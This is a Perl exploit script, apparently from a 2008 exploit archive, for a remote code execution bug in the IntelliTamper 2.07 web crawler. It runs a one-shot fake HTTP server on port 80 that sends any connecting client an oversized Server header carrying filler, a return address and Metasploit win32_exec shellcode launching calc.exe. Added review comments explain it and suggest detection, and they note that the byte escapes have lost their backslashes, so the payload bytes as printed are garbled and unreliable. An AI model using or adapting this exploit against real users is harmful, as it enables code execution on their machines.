
intellitamper207-exec.txt

Posted on 23 July 2008

#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#
# NOTE(review): What this script is. It is a one-shot fake HTTP server: it
# binds TCP port 80, accepts a single client, discards whatever that client
# sends, and answers with one HTTP response whose "Server:" header value is
# $buff (filler, return-address bytes, then the payload). The vulnerable
# party is the *client* that parses that header (IntelliTamper 2.07 per the
# title); nothing is exploited on the host running this script.
#
# NOTE(review): The listing as shown appears to be extraction-mangled: the
# byte escapes in $fun and $sh3llcode have no backslashes (e.g. "xb3x8d..."),
# so as written they are plain ASCII text, and the CRLF separators between
# HTTP header lines have become spaces. Byte values on this page should not
# be treated as authoritative.
#
# Detection / mitigation: an HTTP response whose Server header runs to
# several KB is anomalous and is the obvious signature for a proxy or IDS
# rule; the fix belongs in the client (bound the copy of the header value).
#
use IO::Socket;

my $msg="";                 # receive buffer for the client's request; never inspected

# 1536 bytes of filler before the return-address overwrite (author's figure).
my $overflow = "A"x1536;

# Return-address overwrite followed by more padding. The author labels the
# first four bytes as a "call esp" in NTDLL.DLL at 0x7C958DB3; that is the
# author's claim and cannot be checked from this file.
my $fun = "".
"xb3x8dx95x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here

# Payload. Per the author's header it is a Metasploit win32_exec payload that
# launches calc.exe (338 bytes, Alpha2-encoded); with the backslashes lost
# the text below cannot be verified against that description.
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax63".
"x58x30x42x31x50x42x41x6bx41x41x73x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x4bx59x59x6cx6a".
"x48x70x44x35x50x65x50x73x30x6ex6bx33x75x75x6cx4c".
"x4bx71x6cx53x35x74x38x55x51x78x6fx6ex6bx62x6fx36".
"x78x6cx4bx53x6fx65x70x36x61x6ax4bx43x79x6ex6bx76".
"x54x4ex6bx53x31x68x6ex64x71x6fx30x5ax39x4ex4cx6e".
"x64x6fx30x71x64x75x57x78x41x38x4ax74x4dx76x61x4f".
"x32x5ax4bx39x64x75x6bx43x64x67x54x74x44x74x35x48".
"x65x6cx4bx73x6fx37x54x57x71x38x6bx70x66x6ex6bx64".
"x4cx70x4bx4ex6bx33x6fx35x4cx64x41x38x6bx4cx4bx37".
"x6cx4cx4bx76x61x58x6bx6cx49x43x6cx55x74x56x64x4f".
"x33x44x71x4fx30x30x64x6cx4bx77x30x74x70x6fx75x49".
"x50x50x78x36x6cx4cx4bx33x70x54x4cx6ex6bx30x70x45".
"x4cx6ex4dx4cx4bx55x38x43x38x78x6bx44x49x6ex6bx4b".
"x30x6cx70x45x50x65x50x75x50x4cx4bx41x78x75x6cx51".
"x4fx30x31x7ax56x51x70x30x56x4fx79x38x78x6cx43x6b".
"x70x71x6bx72x70x61x78x4ax50x4dx5ax43x34x43x6fx43".
"x58x4cx58x49x6ex6cx4ax66x6ex43x67x69x6fx48x67x43".
"x53x73x51x50x6cx41x73x66x4ex70x65x72x58x71x75x37".
"x70x63";

my $overflow2 = "A"x1046;   # declared but never referenced again
my $buff = "$overflow$fun$sh3llcode";

# The response. Content-Length: 8 describes the 8-byte body "Exploit!";
# the oversized value travels in the Server header, not in the body.
my $resp = "".
"HTTP/1.1 200 OK ".
"Connection: close ".
"Content-Length: 8 ".
"Date: Mon, 21 Jul 2008 20:47:05 GMT ".
"Content-Type: text/plain ".
"Server: $buff ".
"MIME-Version: 1.0 ".
"Exploit! ";

# Indirect-object syntax (IO::Socket::INET->new(...) is the conventional
# form). The return value is not checked: if port 80 cannot be bound
# (privileged port, or already in use) $sock is undef and accept() dies.
my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );
print "Listening on port 80 for connections... ";
my $new_sock = $sock->accept();
print "Got connection from client... ";
# Reads at most 190 bytes of the request and ignores them: the request is
# never parsed, so any client that connects is sent the payload.
my $sock_addr = recv($new_sock,$msg,190,0);   # $sock_addr is never used
print "Sending client packet... ";
print $new_sock "$resp";
print "Packet sent to client, voila? ";
close($sock);               # closes the listening socket only; $new_sock is left to close at exit
print "Socket closed ";

 
